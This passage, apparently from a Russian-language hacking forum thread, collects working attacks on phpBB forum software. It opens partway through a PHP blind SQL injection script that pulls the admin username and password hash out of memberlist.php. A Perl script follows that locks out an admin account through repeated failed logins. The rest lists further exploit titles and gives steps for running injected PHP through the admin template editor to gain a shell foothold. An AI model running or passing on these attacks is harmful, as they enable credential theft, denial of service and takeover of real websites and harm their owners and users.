sendpacketii($packet);
if (!strstr($html,"No members found for this search criteria")) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(2);break;}
}
if ($i==255) {die("Exploit failed...");}
}
$j++;
}

$j=1;$admin="";
while (!strstr($admin,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
$sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USERNAME,".$j.",1))=$i),$user_id ,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
echo "sql -> ".$sql."\n";
$sql=urlencode(strtoupper($sql));
$data="username=";
$data.="&icq=";
$data.="&email=";
$data.="&aim=";
$data.="&joined_select=lt";
$data.="&joined=";
$data.="&yahoo=";
$data.="&active_select=lt";
$data.="&active=";
$data.="&msn=";
$data.="&count_select=eq";
$data.="&count=";
$data.="&jabber=";
$data.="&sk=c";
$data.="&sd=a";
$data.="&ip=".$sql;
$data.="&search_group_id=0";
$data.="&submit=Search";
$packet="POST ".$p."memberlist.php?joined_select=lt&active_selec t=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post &field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cookie: ".$cookie." \r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (!strstr($html,"No members found for this search criteria")) {$admin.=chr($i);echo "password -> ".$admin."[???]\r\n";sleep(2);break;}
}
if ($i==255) {die("Exploit failed...");}
$j++;
}
echo "--------------------------------------------------------------------\r\n";
echo "admin -> ".$admin."\r\n";
echo "password (md5) -> ".$password."\r\n";
echo "--------------------------------------------------------------------\r\n";

function is_hash($hash)
{
if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
else {return false;}
}

if (is_hash($password)) {echo "Exploit succeeded";}
else {echo "Exploit failed.";}
?>

эксплойт под phpbb 2.0.22. Вся его фича в том что он выбивает с форума пользователя на мин 15 ;)

Скрытый текст

##################################################  #################################
#!/usr/bin/perl
# Priv8 Exploit for PHPBB 2.0.22
# This Exploit Disable Admin Or other User IN PHPBB Forums For 15 Min
#Discover & Writ By : Hossein-Asgari
# Comment : PHPBB 2.0.18 Secured Bruteforce Cracking Password !
# BUT :
# If anybody Bruteforce TO ADMIN Account --> Admin Account Is Disable .
# Enjoy !
##################################################  #################################
$host=$ARGV[0];
$dirc=$ARGV[1];
$port=$ARGV[2];
$user=$ARGV[3];

$dirsend = "$dirc" . "login.php";
print "
   -------------------------------------
   phpbb-Disable-user.php <Host> </Dir/> <Port> <Admin Username >
   --------------------------------------
   ";
$i=1;
if ($host ne ""){
while($OK ne 1){


use IO::Socket;
my($socket) ="";
   if ($socket = IO::Socket::INET->new(PeerAddr => $host ,
                                       PeerPort => $port ,
                                       Proto    => "TCP"))
{


$password=rand();
$data  = "username="."$user"."&password="."$password"."&redirect=&login=Connexion
";
$length = length $data;
print $socket "POST $dirsend HTTP/1.1
Host: $host
Content-Type: application/x-www-form-urlencoded
Content-Length: $length

$data";
read  $socket, $answer, 15;
close($socket);
}
if($answer =~ /HTTP\/(.*?) 302/){$OK = 1;}
$i=$i+"1";
print "$answer
";
print "Send Packet $i ....
" ;

}}

[###]

phpBB 3 (Mod Tag Board <= 4) Remote Blind SQL Injection Exploit

[###]

phpBB 3 (autopost bot mod <= 0.1.3) Remote File Include Vulnerability
Новая дырка B)

[Johkel3]

заливка шелла в phpBB 3 версии.
1) Вкладка общие --> Безопасность
Разрешить php в шаблонах: Да
2)Вкладка Стили --> Компоненты стилей ->> Шаблоны
С помощью встроенного редактора шаблонов выбираем файл и пишем в него:

<!-- PHP --> phpinfo(); <!-- ENDPHP -->

Далее применяем шаблон, идем на измененную страницу и видим наш php код

[###]

phpBB 3.0.7-PL1 - Denial Of Service PoC
]]>http://inj3ct0r.com/exploits/13992]]>